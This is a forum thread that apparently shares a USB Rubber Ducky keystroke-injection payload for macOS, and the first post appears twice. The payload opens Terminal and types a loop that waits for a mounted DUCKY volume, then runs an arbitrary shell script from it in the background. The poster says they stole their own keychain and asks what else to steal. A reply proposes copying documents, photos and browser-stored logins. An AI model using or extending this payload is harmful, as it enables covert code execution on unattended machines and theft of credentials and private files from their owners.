Jump to content

[Payload] OSX Run duckslurp shell in the background ASAP


Toreddo
 Share

Recommended Posts

I created a pretty simple payload for Mac OSX, this is the fastest I could get it. You might want to play with some delays but my decent mac is running this just fine. It basically types in a while loop in the terminal that waits for a volume to mount named DUCKY by looking for file 'a', and then executes an SH script called 'a' (the same file). This is done to make it as short as possible.

DELAY 3000
COMMAND SPACE
DELAY 200
STRING terminal
ENTER
DELAY 200
STRING while [ ! -f /Volumes/DUCKY/a ] ; do sleep 2 ; done && sh /Volumes/DUCKY/a &
ENTER
STRING disown
ENTER
STRING exit
ENTER
COMMAND Q

So in your 'a' file you can write any length shell script you want, it will all execute on the background.

P.s. I just stole my own keychain, are there any more interesting things I could try to steal?

Link to comment
Share on other sites

  • 7 months later...

This looks interesting, do you think its the best approach? Have you figured out more since? I'm definitely going to test this out and see how it works. Thanks for sharing!

How would you go about the keychain copying?

I'd like to attempt the same, and maybe also experiment with grabbing the active User / Documents / Photo Library / Movies directories and copying them to the Ducky USB mounted section, maybe even the Chrome and Firefox favorites, stored logins, etc. Basically like a super-backup saving feature for dire situations.

I created a pretty simple payload for Mac OSX, this is the fastest I could get it. You might want to play with some delays but my decent mac is running this just fine. It basically types in a while loop in the terminal that waits for a volume to mount named DUCKY by looking for file 'a', and then executes an SH script called 'a' (the same file). This is done to make it as short as possible.

DELAY 3000
COMMAND SPACE
DELAY 200
STRING terminal
ENTER
DELAY 200
STRING while [ ! -f /Volumes/DUCKY/a ] ; do sleep 2 ; done && sh /Volumes/DUCKY/a &
ENTER
STRING disown
ENTER
STRING exit
ENTER
COMMAND Q

So in your 'a' file you can write any length shell script you want, it will all execute on the background.

P.s. I just stole my own keychain, are there any more interesting things I could try to steal?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...